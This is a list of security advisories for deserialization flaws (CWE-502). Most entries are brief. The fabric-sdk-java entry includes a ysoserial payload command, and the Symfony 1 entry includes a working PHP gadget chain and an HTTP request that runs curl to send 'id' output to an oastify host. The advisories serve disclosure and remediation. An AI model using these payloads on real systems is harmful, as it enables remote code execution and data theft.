Common Weakness Enumeration

CWE-502

Allowed

Deserialization of Untrusted Data

Abstraction: Base · Status: Draft

The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

4802 vulnerabilities reference this CWE, most recent first.

GHSA-PRF8-CF2X-RHX7

Vulnerability from github – Published: 2026-04-29 20:41 – Updated: 2026-05-20 22:56
VLAI
Summary
fabric-sdk-java has ObjectInputStream.readObject() without ObjectInputFilter, which allows Java deserialization RCE
Details

Summary

This advisory covers the deprecated fabric-sdk-java client SDK. Channel.java implements readObject() and exposes deSerializeChannel() which call ObjectInputStream.readObject() on untrusted byte arrays without configuring an ObjectInputFilter. This is the classic Java deserialization RCE pattern.

Note: fabric-sdk-java is deprecated and maintained in https://github.com/hyperledger/fabric-sdk-java. Filing here as that repo does not have private vulnerability reporting enabled.

Affected Code

// src/main/java/org/hyperledger/fabric/sdk/Channel.java
private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
    in.defaultReadObject();  // No ObjectInputFilter configured
}

public Channel deSerializeChannel(byte[] channelBytes)
        throws IOException, ClassNotFoundException, InvalidArgumentException {
    ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(channelBytes));
    Channel channel = (Channel) ois.readObject();  // Untrusted bytes deserialized
    return channel;
}

Attack Vector

An attacker who can supply crafted serialized Channel bytes to the client application — for example, by compromising a local channel file, injecting data through an application that accepts Channel bytes from external sources, or exploiting a separate write primitive — can achieve RCE via gadget chain exploitation when deSerializeChannel() processes those bytes. The risk is highest in deployments that accept Channel data from sources outside the client's direct control. Note: channel data is not transmitted from Fabric peers; this is a client-side deserialization surface.

Proof of Concept

// Generate malicious payload with ysoserial:
// java -jar ysoserial.jar CommonsCollections6 "touch /tmp/pwned" > malicious_channel.ser

// Victim code:
byte[] maliciousBytes = Files.readAllBytes(Paths.get("malicious_channel.ser"));
Channel channel = client.deSerializeChannel(maliciousBytes);  // RCE fires here

Notes on Deprecation

fabric-sdk-java is deprecated as of Hyperledger Fabric v2.5 (replaced by org.hyperledger.fabric:fabric-gateway). However, organizations that have not yet migrated remain fully exposed. Automated dependency scanners (Snyk, Dependabot) cannot alert users without a published GHSA. This advisory is filed to ensure those users are notified and directed to migrate.

Fix

For the deprecated SDK: add ObjectInputFilter to whitelist only expected classes:

ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
    "org.hyperledger.fabric.sdk.*;java.util.*;java.lang.*;!*"
);
ois.setObjectInputFilter(filter);

The recommended remediation is migration to org.hyperledger.fabric:fabric-gateway, which does not use Java serialization.

Resources

  • CWE-502: Deserialization of Untrusted Data
  • Migration guide: https://hyperledger.github.io/fabric-gateway/

Credits

Found by Martin Brodeur (brodmart) via independent security research.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.hyperledger.fabric-sdk-java:fabric-sdk-java"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "last_affected": "2.2.26"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41586"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-29T20:41:58Z",
    "nvd_published_at": "2026-05-07T06:16:04Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThis advisory covers the deprecated `fabric-sdk-java` client SDK. `Channel.java` implements `readObject()` and exposes `deSerializeChannel()` which call `ObjectInputStream.readObject()` on untrusted byte arrays without configuring an `ObjectInputFilter`. This is the classic Java deserialization RCE pattern.\n\n**Note:** `fabric-sdk-java` is deprecated and maintained in https://github.com/hyperledger/fabric-sdk-java. Filing here as that repo does not have private vulnerability reporting enabled.\n\n## Affected Code\n\n```java\n// src/main/java/org/hyperledger/fabric/sdk/Channel.java\nprivate void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {\n    in.defaultReadObject();  // No ObjectInputFilter configured\n}\n\npublic Channel deSerializeChannel(byte[] channelBytes)\n        throws IOException, ClassNotFoundException, InvalidArgumentException {\n    ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(channelBytes));\n    Channel channel = (Channel) ois.readObject();  // Untrusted bytes deserialized\n    return channel;\n}\n```\n\n## Attack Vector\n\nAn attacker who can supply crafted serialized Channel bytes to the client application \u2014 for example, by compromising a local channel file, injecting data through an application that accepts Channel bytes from external sources, or exploiting a separate write primitive \u2014 can achieve RCE via gadget chain exploitation when deSerializeChannel() processes those bytes. The risk is highest in deployments that accept Channel data from sources outside the client\u0027s direct control. Note: channel data is not transmitted from Fabric peers; this is a client-side deserialization surface.\n\n## Proof of Concept\n\n```java\n// Generate malicious payload with ysoserial:\n// java -jar ysoserial.jar CommonsCollections6 \"touch /tmp/pwned\" \u003e malicious_channel.ser\n\n// Victim code:\nbyte[] maliciousBytes = Files.readAllBytes(Paths.get(\"malicious_channel.ser\"));\nChannel channel = client.deSerializeChannel(maliciousBytes);  // RCE fires here\n```\n\n## Notes on Deprecation\n\nfabric-sdk-java is deprecated as of Hyperledger Fabric v2.5 (replaced by `org.hyperledger.fabric:fabric-gateway`). However, organizations that have not yet migrated remain fully exposed. Automated dependency scanners (Snyk, Dependabot) cannot alert users without a published GHSA. This advisory is filed to ensure those users are notified and directed to migrate.\n\n## Fix\n\nFor the deprecated SDK: add `ObjectInputFilter` to whitelist only expected classes:\n\n```java\nObjectInputFilter filter = ObjectInputFilter.Config.createFilter(\n    \"org.hyperledger.fabric.sdk.*;java.util.*;java.lang.*;!*\"\n);\nois.setObjectInputFilter(filter);\n```\n\n**The recommended remediation is migration to `org.hyperledger.fabric:fabric-gateway`**, which does not use Java serialization.\n\n## Resources\n\n- CWE-502: Deserialization of Untrusted Data\n- Migration guide: https://hyperledger.github.io/fabric-gateway/\n\n## Credits\n\nFound by [Martin Brodeur (brodmart)](https://github.com/brodmart) via independent security research.",
  "id": "GHSA-prf8-cf2x-rhx7",
  "modified": "2026-05-20T22:56:25Z",
  "published": "2026-04-29T20:41:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/hyperledger/fabric/security/advisories/GHSA-prf8-cf2x-rhx7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41586"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hyperledger/fabric-sdk-java"
    },
    {
      "type": "WEB",
      "url": "https://hyperledger.github.io/fabric-gateway"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "fabric-sdk-java has ObjectInputStream.readObject() without ObjectInputFilter, which allows Java deserialization RCE"
}

GHSA-PRP9-9GXW-38J8

Vulnerability from github – Published: 2022-05-24 19:05 – Updated: 2022-05-24 19:05
VLAI
Details

A deserialization flaw was found in Apache Chainsaw versions prior to 2.1.0 which could lead to malicious code execution.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-9493"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-06-16T08:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "A deserialization flaw was found in Apache Chainsaw versions prior to 2.1.0 which could lead to malicious code execution.",
  "id": "GHSA-prp9-9gxw-38j8",
  "modified": "2022-05-24T19:05:32Z",
  "published": "2022-05-24T19:05:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9493"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r50d389c613ba6062a26aa57e163c09bfee4ff2d95d67331d75265b83@%3Cannounce.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://www.openwall.com/lists/oss-security/2021/06/16/1"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2021/06/16/1"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2022/01/18/5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-PV2V-6W2V-97X6

Vulnerability from github – Published: 2026-05-21 21:30 – Updated: 2026-06-23 22:57
VLAI
Summary
Concrete CMS Vulnerable to Deserialization of Untrusted Data
Details

Concrete CMS 9.5.0 and below is vulnerable to Remote Code Execution due to insecure deserialization occurring in the ExpressEntryList block controller. An rogue administrator with privileges to add blocks to an area can bypass the intended protection mechanism (_fromCIF === true), which normally restricts malicious inputs over form POST requests, by leveraging the REST API functionality. Because the REST API parses requests using json_decode(), the string "true" is evaluated as a strict PHP Boolean(true).  This bypass allows the attacker to inject a malicious serialized payload  into the block's filterFields database column. The payload will subsequently be executed when the block's data is viewed or edited by an administrator leading to complete server takeover (RCE). Concrete CMS thanks Nguyễn Văn Thiện https://github.com/Thien225409  for reporting this issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "concrete5/concrete5"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "9.5.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-8135"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-23T22:57:59Z",
    "nvd_published_at": "2026-05-21T21:16:32Z",
    "severity": "HIGH"
  },
  "details": "Concrete CMS 9.5.0 and below is vulnerable to Remote Code Execution  due to insecure deserialization occurring in the\u00a0ExpressEntryList\u00a0block controller. An rogue administrator with privileges to add blocks to an area can bypass the intended protection mechanism (_fromCIF === true), which normally restricts malicious inputs over form POST requests, by leveraging the REST API functionality. Because the REST API parses requests using json_decode(), the string \"true\" is evaluated as a strict PHP Boolean(true).\u00a0 This bypass allows the attacker to inject a malicious serialized payload \u00a0into the block\u0027s filterFields database column. The payload will subsequently be executed when the block\u0027s data is viewed or edited by an administrator leading to complete server takeover (RCE). Concrete CMS thanks  Nguy\u1ec5n V\u0103n Thi\u1ec7n https://github.com/Thien225409 \u00a0for reporting this issue.",
  "id": "GHSA-pv2v-6w2v-97x6",
  "modified": "2026-06-23T22:57:59Z",
  "published": "2026-05-21T21:30:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8135"
    },
    {
      "type": "WEB",
      "url": "https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/concretecms/concretecms"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Concrete CMS Vulnerable to Deserialization of Untrusted Data"
}

GHSA-PV5G-2VGJ-2G6W

Vulnerability from github – Published: 2023-03-28 00:34 – Updated: 2023-04-03 18:32
VLAI
Details

The InputMethod module has a vulnerability of serialization/deserialization mismatch. Successful exploitation of this vulnerability may cause privilege escalation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-26547"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-03-27T22:15:00Z",
    "severity": "HIGH"
  },
  "details": "The InputMethod module has a vulnerability of serialization/deserialization mismatch. Successful exploitation of this vulnerability may cause privilege escalation.",
  "id": "GHSA-pv5g-2vgj-2g6w",
  "modified": "2023-04-03T18:32:03Z",
  "published": "2023-03-28T00:34:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26547"
    },
    {
      "type": "WEB",
      "url": "https://consumer.huawei.com/en/support/bulletin/2023/3"
    },
    {
      "type": "WEB",
      "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202303-0000001529824505"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-PV7H-HX5H-MGFJ

Vulnerability from github – Published: 2022-06-11 00:00 – Updated: 2024-05-15 06:28
VLAI
Summary
Unsafe deserialization in com.alibaba:fastjson
Details

The package com.alibaba:fastjson before 1.2.83 is vulnerable to Deserialization of Untrusted Data by bypassing the default autoType shutdown restrictions, which is possible under certain conditions. Exploiting this vulnerability allows attacking remote servers. Workaround: If upgrading is not possible, you can enable safeMode.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.alibaba:fastjson"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.2.25"
            },
            {
              "fixed": "1.2.83"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-25845"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-06-17T00:58:22Z",
    "nvd_published_at": "2022-06-10T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "The package com.alibaba:fastjson before 1.2.83 is vulnerable to Deserialization of Untrusted Data by bypassing the default autoType shutdown restrictions, which is possible under certain conditions. Exploiting this vulnerability allows attacking remote servers. Workaround: If upgrading is not possible, you can enable [safeMode](https://github.com/alibaba/fastjson/wiki/fastjson_safemode).",
  "id": "GHSA-pv7h-hx5h-mgfj",
  "modified": "2024-05-15T06:28:35Z",
  "published": "2022-06-11T00:00:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25845"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alibaba/fastjson/commit/35db4adad70c32089542f23c272def1ad920a60d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alibaba/fastjson/commit/8f3410f81cbd437f7c459f8868445d50ad301f15"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/alibaba/fastjson"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alibaba/fastjson/releases/tag/1.2.83"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alibaba/fastjson/wiki/security_update_20220523"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JAVA-COMALIBABA-2859222"
    },
    {
      "type": "WEB",
      "url": "https://www.ddosi.org/fastjson-poc"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujul2022.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Unsafe deserialization in com.alibaba:fastjson"
}

GHSA-PV9J-C53Q-H433

Vulnerability from github – Published: 2024-03-22 16:56 – Updated: 2024-07-25 13:36
VLAI
Summary
Gadget chain in Symfony 1 due to uncontrolled unserialized input in sfNamespacedParameterHolder
Details

Summary

Symfony 1 has a gadget chain due to dangerous unserialize in sfNamespacedParameterHolder class that would enable an attacker to get remote code execution if a developer unserialize user input in his project.

Details

This vulnerability present no direct threat but is a vector that will enable remote code execution if a developper deserialize user untrusted data. For example:

 public function executeIndex(sfWebRequest $request)
  {
    $a = unserialize($request->getParameter('user'));
  }

We will make the assumption this is the case in the rest of this explanation.

Symfony 1 provides the class sfNamespacedParameterHolder which implements Serializable interface. In particular, when an instance of this class is deserialized, the normal php behavior is hooked by implementing unserialize() method:

    public function unserialize($serialized)
    {
        $this->__unserialize(unserialize($serialized));
    }

Which make an array access on the deserialized data without control on the type of the $data parameter:

    public function __unserialize($data)
    {
        $this->default_namespace = $data[0];
        $this->parameters = $data[1];
    }

Thus, an attacker provide any object type in $data to make PHP access to another array/object properties than intended by the developer. In particular, it is possible to abuse the array access which is triggered on $data[0] for any class implementing ArrayAccess interface. sfOutputEscaperArrayDecorator implements such interface. Here is the call made on offsetGet():

  public function offsetGet($offset)
    {
        $value = isset($this->value[$offset]) ? $this->value[$offset] : null;

        return sfOutputEscaper::escape($this->escapingMethod, $value);
    }

Which trigger escape() in sfOutputEscaper class with attacker controlled parameters from deserialized object with $this->escapingMethod and $this->value[$offset]:

  public static function escape($escapingMethod, $value)
  {
    if (null === $value)
    {
      return $value;
    }

    // Scalars are anything other than arrays, objects and resources.
    if (is_scalar($value))
    {
      return call_user_func($escapingMethod, $value);
    }

Which calls call_user_func with previous attacker controlled input.

PoC

So we need the following object to trigger an OS command like shell_exec("curl https://7v3fcazcqt9v0dowwmef4aph48azyqtei.oastify.com?a=$(id)");:

object(sfNamespacedParameterHolder)#4 (1) {
  ["prop":protected]=>
  object(sfOutputEscaperArrayDecorator)#3 (2) {
    ["value":protected]=>
    array(1) {
      [0]=>
      string(66) "curl https://7v3fcazcqt9v0dowwmef4aph48azyqtei.oastify.com?a=$(id)"
    }
    ["escapingMethod":protected]=>
    string(10) "shell_exec"
  }
}

We craft a chain with PHPGGC. Please do not publish it as I will make a PR on PHPGGC but I wait for you to fix before: * gadgets.php:

class sfOutputEscaperArrayDecorator
{
  protected $value;

  protected $escapingMethod;

  public function __construct($escapingMethod, $value) {
    $this->escapingMethod = $escapingMethod;
    $this->value = $value;
  }
}

class sfNamespacedParameterHolder implements Serializable 
{
    protected $prop = null;

    public function __construct($prop) {
      $this->prop = $prop;
    }

    public function serialize()
    {
        return serialize($this->prop);
    }

    public function unserialize($serialized)
    {

    }
}

  • chain.php:
namespace GadgetChain\Symfony;

class RCE16 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '1.1.0 <= 1.5.18';
    public static $vector = 'Serializable';
    public static $author = 'darkpills';
    public static $information = '';

    public function generate(array $parameters)
    {
        $escaper = new \sfOutputEscaperArrayDecorator($parameters['function'], array($parameters['parameter']));

        $tableInfo = new \sfNamespacedParameterHolder($escaper);

        return $tableInfo;
    }
}

And trigger the deserialization with an HTTP request like the following on a dummy test controller:

POST /frontend_dev.php/test/index HTTP/1.1
Host: localhost:8001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 532

user=C%3A27%3A%22sfNamespacedParameterHolder%22%3A183%3A%7BO%3A29%3A%22sfOutputEscaperArrayDecorator%22%3A2%3A%7Bs%3A8%3A%22%00%2A%00value%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A66%3A%22curl+https%3A%2F%2F7v3fcazcqt9v0dowwmef4aph48azyqtei.oastify.com%3Fa%3D%24%28id%29%22%3B%7Ds%3A17%3A%22%00%2A%00escapingMethod%22%3Bs%3A10%3A%22shell_exec%22%3B%7D%7D

Note that CVSS score is not applicable to this kind of vulnerability.

Impact

The attacker can execute any PHP command which leads to remote code execution.

Recommendation

I recommend to add a type checking before doing any processing on the unserialized input like this example:

public function unserialize($data)
{
    if (is_array($data)) {
      $this->default_namespace = $data[0];
      $this->parameters = $data[1];
    } else {
      $this->default_namespace = null;
      $this->parameters = array();

      // or throw an exception maybe?
    }
}

This fix should be applied in both sfNamespacedParameterHolder and sfParameterHolder.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "friendsofsymfony1/symfony1"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.0"
            },
            {
              "fixed": "1.5.19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-28861"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-22T16:56:18Z",
    "nvd_published_at": "2024-03-22T17:15:07Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nSymfony 1 has a gadget chain due to dangerous unserialize in `sfNamespacedParameterHolder` class that would enable an attacker to get remote code execution if a developer unserialize user input in his project.\n\n### Details\nThis vulnerability present no direct threat but is a vector that will enable remote code execution if a developper deserialize user untrusted data. For example:\n```php\n public function executeIndex(sfWebRequest $request)\n  {\n    $a = unserialize($request-\u003egetParameter(\u0027user\u0027));\n  }\n```\n\nWe will make the assumption this is the case in the rest of this explanation.\n\nSymfony 1 provides the class `sfNamespacedParameterHolder` which implements `Serializable` interface. In particular, when an instance of this class is deserialized, the normal php behavior is hooked by implementing `unserialize()` method:\n```php\n    public function unserialize($serialized)\n    {\n        $this-\u003e__unserialize(unserialize($serialized));\n    }\n```\n\nWhich make an array access on the deserialized data without control on the type of the `$data` parameter:\n```php\n    public function __unserialize($data)\n    {\n        $this-\u003edefault_namespace = $data[0];\n        $this-\u003eparameters = $data[1];\n    }\n```\n\nThus, an attacker provide any object type in `$data` to make PHP access to another array/object properties than intended by the developer. In particular, it is possible to abuse the array access which is triggered on `$data[0]` for any class implementing `ArrayAccess`  interface. `sfOutputEscaperArrayDecorator`  implements such interface. Here is the call made on `offsetGet()`:\n```php\n  public function offsetGet($offset)\n    {\n        $value = isset($this-\u003evalue[$offset]) ? $this-\u003evalue[$offset] : null;\n\n        return sfOutputEscaper::escape($this-\u003eescapingMethod, $value);\n    }\n```\nWhich trigger `escape()` in `sfOutputEscaper` class with attacker controlled parameters from deserialized object with `$this-\u003eescapingMethod` and `$this-\u003evalue[$offset]`:\n```php\n  public static function escape($escapingMethod, $value)\n  {\n    if (null === $value)\n    {\n      return $value;\n    }\n\n    // Scalars are anything other than arrays, objects and resources.\n    if (is_scalar($value))\n    {\n      return call_user_func($escapingMethod, $value);\n    }\n```\nWhich calls `call_user_func` with previous attacker controlled input.\n\n\n### PoC\n\nSo we need the following object to trigger an OS command like `shell_exec(\"curl https://7v3fcazcqt9v0dowwmef4aph48azyqtei.oastify.com?a=$(id)\");`:\n\n```php\nobject(sfNamespacedParameterHolder)#4 (1) {\n  [\"prop\":protected]=\u003e\n  object(sfOutputEscaperArrayDecorator)#3 (2) {\n    [\"value\":protected]=\u003e\n    array(1) {\n      [0]=\u003e\n      string(66) \"curl https://7v3fcazcqt9v0dowwmef4aph48azyqtei.oastify.com?a=$(id)\"\n    }\n    [\"escapingMethod\":protected]=\u003e\n    string(10) \"shell_exec\"\n  }\n}\n```\n\nWe craft a chain with PHPGGC. Please do not publish it as I will make a PR on PHPGGC but I wait for you to fix before:\n* gadgets.php:\n```php\nclass sfOutputEscaperArrayDecorator\n{\n  protected $value;\n\n  protected $escapingMethod;\n\n  public function __construct($escapingMethod, $value) {\n    $this-\u003eescapingMethod = $escapingMethod;\n    $this-\u003evalue = $value;\n  }\n}\n\nclass sfNamespacedParameterHolder implements Serializable \n{\n    protected $prop = null;\n\n    public function __construct($prop) {\n      $this-\u003eprop = $prop;\n    }\n\n    public function serialize()\n    {\n        return serialize($this-\u003eprop);\n    }\n\n    public function unserialize($serialized)\n    {\n        \n    }\n}\n\n```\n\n* chain.php:\n```php\nnamespace GadgetChain\\Symfony;\n\nclass RCE16 extends \\PHPGGC\\GadgetChain\\RCE\\FunctionCall\n{\n    public static $version = \u00271.1.0 \u003c= 1.5.18\u0027;\n    public static $vector = \u0027Serializable\u0027;\n    public static $author = \u0027darkpills\u0027;\n    public static $information = \u0027\u0027;\n\n    public function generate(array $parameters)\n    {\n        $escaper = new \\sfOutputEscaperArrayDecorator($parameters[\u0027function\u0027], array($parameters[\u0027parameter\u0027]));\n\n        $tableInfo = new \\sfNamespacedParameterHolder($escaper);\n        \n        return $tableInfo;\n    }\n}\n```\n\nAnd trigger the deserialization with an HTTP request like the following on a dummy test controller:\n\n```http\nPOST /frontend_dev.php/test/index HTTP/1.1\nHost: localhost:8001\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 532\n\nuser=C%3A27%3A%22sfNamespacedParameterHolder%22%3A183%3A%7BO%3A29%3A%22sfOutputEscaperArrayDecorator%22%3A2%3A%7Bs%3A8%3A%22%00%2A%00value%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A66%3A%22curl+https%3A%2F%2F7v3fcazcqt9v0dowwmef4aph48azyqtei.oastify.com%3Fa%3D%24%28id%29%22%3B%7Ds%3A17%3A%22%00%2A%00escapingMethod%22%3Bs%3A10%3A%22shell_exec%22%3B%7D%7D\n```\n\nNote that CVSS score is not applicable to this kind of vulnerability.\n\n### Impact\nThe attacker can execute any PHP command which leads to remote code execution.\n\n### Recommendation\nI recommend to add a type checking before doing any processing on the unserialized input like this example:\n```php\npublic function unserialize($data)\n{\n    if (is_array($data)) {\n      $this-\u003edefault_namespace = $data[0];\n      $this-\u003eparameters = $data[1];\n    } else {\n      $this-\u003edefault_namespace = null;\n      $this-\u003eparameters = array();\n\n      // or throw an exception maybe?\n    }\n}\n```\n\nThis fix should be applied in both `sfNamespacedParameterHolder` and `sfParameterHolder`.",
  "id": "GHSA-pv9j-c53q-h433",
  "modified": "2024-07-25T13:36:28Z",
  "published": "2024-03-22T16:56:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfSymfony1/symfony1/security/advisories/GHSA-pv9j-c53q-h433"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/friendsofsymfony1/symfony1/CVE-2024-28861.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FriendsOfSymfony1/symfony1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Gadget chain in Symfony 1 due to uncontrolled unserialized input in sfNamespacedParameterHolder"
}

GHSA-PV9W-3HHV-XHXR

Vulnerability from github – Published: 2023-07-06 21:15 – Updated: 2025-01-07 18:30
VLAI
Details

Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-20888"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-07T15:15:09Z",
    "severity": "HIGH"
  },
  "details": "Aria Operations for Networks contains an authenticated deserialization vulnerability.\u00a0A malicious actor with network access to VMware Aria Operations for Networks and valid \u0027member\u0027 role credentials may be able to perform a deserialization attack resulting in remote code execution.",
  "id": "GHSA-pv9w-3hhv-xhxr",
  "modified": "2025-01-07T18:30:36Z",
  "published": "2023-07-06T21:15:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20888"
    },
    {
      "type": "WEB",
      "url": "https://www.vmware.com/security/advisories/VMSA-2023-0012.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-PV9W-H33G-7W3X

Vulnerability from github – Published: 2022-01-29 00:00 – Updated: 2022-02-03 00:00
VLAI
Details

SuiteCRM before 7.12.3 and 8.x before 8.0.2 allows PHAR deserialization that can lead to remote code execution.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-45899"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-01-28T17:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "SuiteCRM before 7.12.3 and 8.x before 8.0.2 allows PHAR deserialization that can lead to remote code execution.",
  "id": "GHSA-pv9w-h33g-7w3x",
  "modified": "2022-02-03T00:00:29Z",
  "published": "2022-01-29T00:00:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45899"
    },
    {
      "type": "WEB",
      "url": "https://docs.suitecrm.com/8.x/admin/releases/8.0"
    },
    {
      "type": "WEB",
      "url": "https://docs.suitecrm.com/admin/releases/7.12.x"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-PVJ5-9XHR-XJVG

Vulnerability from github – Published: 2026-07-10 15:31 – Updated: 2026-07-10 15:31
VLAI
Details

Dell Unisphere for PowerMax, version(s) 10.3.0.5 and prior, contain(s) a Deserialization of Untrusted Data vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to arbitrary command execution with root privileges.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-54469"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-10T13:16:20Z",
    "severity": "HIGH"
  },
  "details": "Dell Unisphere for PowerMax, version(s) 10.3.0.5 and prior, contain(s) a Deserialization of Untrusted Data vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to arbitrary command execution with root privileges.",
  "id": "GHSA-pvj5-9xhr-xjvg",
  "modified": "2026-07-10T15:31:39Z",
  "published": "2026-07-10T15:31:39Z",
  "references": [
    {
